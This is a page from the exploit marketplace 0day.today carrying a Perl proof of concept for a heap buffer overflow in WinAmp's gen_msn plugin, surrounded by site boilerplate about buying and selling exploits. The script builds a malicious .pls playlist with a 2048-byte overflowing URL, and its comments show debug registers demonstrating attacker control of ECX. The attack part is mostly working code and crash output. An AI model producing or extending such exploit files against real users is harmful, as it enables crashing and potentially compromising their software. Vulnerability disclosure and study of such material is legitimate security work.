0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC
============================================== WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC ============================================== #!/usr/bin/perl # WinAmp GEN_MSN Plugin Heap Buffer Overflow # ------------------------------------ # Discovered by SkD (skdrat@hotmail.com) & # (skd@abysssec.com) # ------------------------------------ # # I'm not much for posting PoCs because # I like writing exploits for whatever # I discover and if I don't, its a waste. # # Anyway, this buffer overflow is located # in the gen_msn plugin, which # is basically a plugin that shows what # song you're currently listening to # on your PM in MSN. The plugin has over # 800,000 downloads so its serious.. # (http://www.winamp.com/plugins/details/144799) # This is similar to my other recent exploit # for VUPlayer because it uses the same point # of the .PLS playlist file! # # Debug Info: # MOV EDI,DWORD PTR DS:[ECX+EAX*4+960] # Regs: # EAX 00000003 # ECX 41414141 <- Clear control over the register # EDX 007EA478 # EBX 40000001 # ESP 028F1DB0 # EBP 77230459 USER32.SendMessageA # ESI 08FD62A8 gen_msn.08FD62A8 # EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" # EIP 08FD293C gen_msn.08FD293C # # Peace out. # _________ ___ ________ # / _____/| | __\______ \ # \_____ \ | |/ / | | \ # / \| < | ` \ # /_______ /|__|_ \/_______ / # \/ \/ \/ use strict; use warnings; my $overflow = "\x41" x 2048; open(my $pls_playlist, "> poc.pls"); print $pls_playlist "[playlist]\r\n". "NumberOfEntries=1\r\n". "File1=http://". $overflow. "\r\n"; close $pls_playlist; # 0day.today [2024-12-24] #